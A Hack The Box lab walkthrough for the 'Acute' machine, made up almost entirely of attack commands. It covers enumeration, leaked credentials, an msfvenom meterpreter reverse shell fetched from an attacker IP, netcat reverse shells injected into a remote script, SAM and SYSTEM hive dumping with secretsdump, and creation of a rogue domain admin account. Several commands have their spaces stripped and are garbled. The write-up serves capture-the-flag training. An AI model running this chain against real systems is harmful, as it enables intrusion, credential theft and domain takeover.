Hack_The_Box_Writeups

HackTheBox – Acute Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.145

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat /etc/hosts | grep 10.10.11.145

https://atsserver.acute.local/

https://atsserver.acute.local/about.html

┌──(root㉿kali)-[/home/kali/Downloads]

└─# feroxbuster -u https://atsserver.acute.local/ -x aspx -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

Now we have to go back to browser

Click on New Starter Forms

┌──(root㉿kali)-[/home/kali/Downloads]

└─# exiftool New_Starter_CheckList_v7.docx

https://atsserver.acute.local/Acute_Staff_Access

For the userlist

Awallace

Chall

Edavies

Imonks

Jmorgan

Lhopkins

Username: Edavies

Password: Password1!

Computername: Acute-PC01

I was able to get in with edavies now time to enumerate the system more to see what we can loot. So the best thing o do now is to get a proper reverse shell back to our terminal.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.102 LPORT=1337 -f exe > shell.exe

PS C:\> cd Utils

PS C:\Utils> Invoke-WebRequest “http://10.10.14.102:8000/shell.exe” -OutFile “shell.exe”

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > options

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp

msf6 exploit(multi/handler) > options

msf6 exploit(multi/handler) > set LHOST 10.10.14.102

msf6 exploit(multi/handler) > set LPORT 1337

msf6 exploit(multi/handler) > exploit

PS C:\Utils> ./shell.exe

meterpreter > getuid

meterpreter > sysinfo

meterpreter > screenshare

meterpreter > shell

C:\Utils>powershell

PS C:\Utils> ipconfig

PS C:\Utils> ping atsserver

PS C:\Users\edavies\Documents> $passwd = ConvertTo-SecureString “W3_4R3_th3_f0rce.” -AsPlainText -Force

PS C:\Users\edavies\Documents> $cred = New-Object System.Management.Automation.PSCredential (“acute\imonks”, $passwd)

PS C:\Users\edavies\Documents> invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {whoami} -credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { Get-Command } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { Get-Alias } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { ls ‘\program files’ } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { ls ..\desktop } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

┌──(root㉿kali)-[/home/kali/Downloads]

└─# rlwrap -cAr nc -lnvp 444

PS C:\utils> Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace ‘Get-Volume’, ‘C:\utils\nc.exe -e cmd 10.10.14.102 444’) | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-WebRequest “http://10.10.14.102:8000/nc64.exe” -OutFile “nc.exe”

PS C:\utils> Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils>regsaveHKLM\samsam.bak

PS C:\Utils> reg save HKLM\system sys.bak

meterpreter > download sam.bak

meterpreter > download sys.bak

┌──(root㉿kali)-[/home/kali/Downloads]

└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.bak -system sys.bak LOCAL

Hash value: a29f7623fd11550def0192de9246f46b

PS C:\Utils>$pass=ConvertTo-SecureString“Password@123”-AsPlainText-Force

PS C:\Utils>$cred=New-ObjectSystem.Management.Automation.PSCredential(“ACUTE\awallace”,$pass)

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }

PS C:\Utils>Invoke-Command-ScriptBlock{ls’\program files\keepmeon’}-ComputerNameATSSERVER-ConfigurationNamedc_manage-Credential$cred

PS C:\Utils> invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /"program files"/keepmeon/keepmeon.bat} -credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { net group /domain  } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { net group Site_Admin /domain  } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils>Invoke-Command-ScriptBlock{Set-Content-Path‘\program files\keepmeon\pentest.bat’-Value‘net group site_admin awallace /add /domain’}-ComputerNameATSSERVER-ConfigurationNamedc_manageCredential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { cat ‘\program files\keepmeon\pentest.bat’ } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils> Invoke-Command-ScriptBlock{netgroupSite_Admin/domain}-ComputerNameATSSERVER-ConfigurationNamedc_manage-Credential$cred

PS C:\Utils> Invoke-Command-ScriptBlock{catC:\users\Administrator\desktop\root.txt}-ComputerNameATSSERVER-ConfigurationNamedc_manage-Credential$cred

PS C:\Utils> Invoke-Command-ScriptBlock{whoami/priv}-ComputerNameATSSERVER-Credential$cred

PS C:\Utils> Invoke-Command -ScriptBlock { net user pentest abcdABCD1234!@#$ /add /domain /Y } -ComputerName ATSSERVER -Credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { net group “Domain Admins” pentest /add /domain } -ComputerName ATSSERVER -Credential $cred

──(root㉿kali)-[/home/kali/Downloads]

└─# rlwrap -cAr nc -lnvp 444

PS C:\Utils>Invoke-Command-ComputerNameATSSERVER-Credential$cred-ScriptBlock{wget10.10.14.102:8000/nc64.exe-outfile\programdata\nc.exe}

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ScriptBlock { \programdata\nc.exe -e cmd 10.10.14.102 444}

C:\Users\awallace\Documents>whoami /priv

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *